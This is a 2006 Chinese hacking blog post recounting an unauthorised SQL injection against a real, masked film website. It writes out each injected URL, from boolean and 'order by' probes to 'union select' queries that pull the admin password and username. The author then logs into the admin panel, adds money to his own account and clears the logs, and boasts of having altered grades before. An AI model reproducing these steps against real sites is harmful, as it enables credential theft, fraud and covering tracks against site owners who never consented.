首页 > 入侵渗透, 我的作品, 脚本相关 > 手工PHP注入,搞定大型电影网站

手工PHP注入,搞定大型电影网站

2006年4月10日 spookzang 发表评论 阅读评论

因为,某人说我,老改成绩没意思,我想了想也是,改成绩哪有意思啊。于是瞎转悠,无意中在北京的BBN (www.bbn.com.cn)上看到了一个大型的电影网站,于是乎,有了下文。

随便打开一个PHP网页  提交 http://www.xxx.com.cn/wz_xi.php?id=1607 and 1=1/*(因为网页里含有色情内容,所以网站隐去,有兴趣的朋友自己去BBN上找) 返回正常页面。

http://www.spookzang.net/upload/1.jpg

提交 http://www.xxx.com.cn/wz_xi.php?id=1607 and 1=2/* 返回提示没有此电影。

http://www.spookzang.net/upload/2.jpg

 据我判断 这里有PHP注入。

我在提交 http://www.xxx.com.cn/wz_xi.php?id=1607 and ord(mid(version(),1,1))>51/*  返回了正常页面, YES! 支持UNION查询。 呵呵,这就简单咯  嘎嘎。

然后我提交 http://www.xxx.com.cn/wz_xi.php?id=1607 order by 10/*,返回结果正常。如图

http://www.spookzang.net/upload/1.jpg

看来他字段大于10。

我在提交 http://www.xxx.com.cn/wz_xi.php?id=1607 order by 20/*,返回错误结果。

看来字段是在10-20之间。 然后经过我的一番提交,确定了他又10个字段!
然后我提交 http://www.xxx.com.cn/wz_xi.php?id=1607 and 1=2 union select 1,2,3,4,5,6,7,8,9,10/* 返回如图所示。

http://www.spookzang.net/upload/3.jpg

这个图的意思是,用UNION查询的话,显示4的地方会显示你要的内容!。

下面就是猜解表和列了。

提交http://www.xxx.com.cn/wz_xi.php?id=1607 and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin/*  返回正常页面,说明有ADMIN这个表。  然后猜解字段。

提交 http://www.xxx.com.cn/wz_xi.php?id=1607 and 1=2 union select 1,2,3,pass,5,6,7,8,9,10 from admin/* 这句话的意思是 让ADMIN 里的PASS字段在4这个位置显示出来。  hoho~  密码出来了

http://www.spookzang.net/upload/5.jpg

然后 提交 http://www.xxx.com.cn/wz_xi.php?id=1607 and 1=2 union select 1,2,3,userid,5,6,7,8,9,10 from admin/*  哈哈,用户名也出来了。

http://www.spookzang.net/upload/4.jpg

剩下的就是找后台了。

这就得用到 google了  在搜索里输入 admin site:www.xxx.com.cn  哈哈 后台也出来了

http://www.spookzang.net/upload/6.jpg

这时  我仿佛看见了免费的电影在向我挥手 。

然后用密码登陆  YES 成功!

http://www.spookzang.net/upload/7.jpg

剩下的当然就是给自己的电影帐号加钱,然后清理日志走人

分类: 入侵渗透, 我的作品, 脚本相关 标签: , , , , ,
  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.